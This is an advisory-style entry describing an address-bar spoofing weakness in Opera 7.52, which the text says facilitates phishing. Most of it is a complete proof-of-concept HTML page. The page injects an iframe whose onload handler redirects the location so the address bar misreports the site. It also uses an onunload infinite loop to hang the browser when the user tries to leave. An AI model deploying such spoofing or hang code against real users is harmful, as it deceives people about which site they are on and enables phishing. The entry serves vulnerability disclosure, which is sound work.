Opera Web Browser 7.5x - IFrame OnLoad Address Bar URL Obfuscation

source: https://www.securityfocus.com/bid/10679/info

Opera Web Browser is prone to a security weakness that may permit malicious web pages to spoof address bar information. 

It is currently not known if this issue is related to the Opera Web Browser Address Bar Spoofing Weakness reported in BID 10337. As more information becomes available this BID will be updated.

This issue may be used to spoof information in the address bar, facilitating phishing attacks against unsuspecting users.

This issue is reported to affect Opera Web Browser version 7.52, it is likely that other versions are affected as well.

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<meta http-equiv="Content-Script-Type" content="text/javascript">
<meta http-equiv="Content-Style-Type" content="text/css">
<title>Opera 7.52 Address Bar Spoofing Vulnerability</title>
<style type="text/css">
<!-- /* begin */
 h1 { font-size:120%;}
 h2 { font-size:100%;}
/* end */ -->
</style>
<script type="text/javascript">
<!--
function urlfake(){
location.href="http://www.microsoft.com/";
}
function preinline () {
myvar = '<iframe onload="urlfake()" ';
myvar = myvar +  'title="preload inline frame" ';
myvar = myvar + 'src="http://www.opera.com/" ';
myvar = myvar +  'frameborder="0" width="760" height="1800" ';
myvar = myvar +  'marginwidth="0" marginheight="0">';
myvar = myvar +  '<' + '/iframe>';
document.write (myvar);
}
// -->
</script>
</head>
<body onunload="while(1){};">
<h1>Opera Browser 7.52 (Build 3834) Address Bar Spoofing Issue</h1>
<h2>Tested on WindowsXP SP1</h2>
<p>
<script type="text/javascript">
<!--
preinline ();
// -->
</script>
</p>
</body>
</html>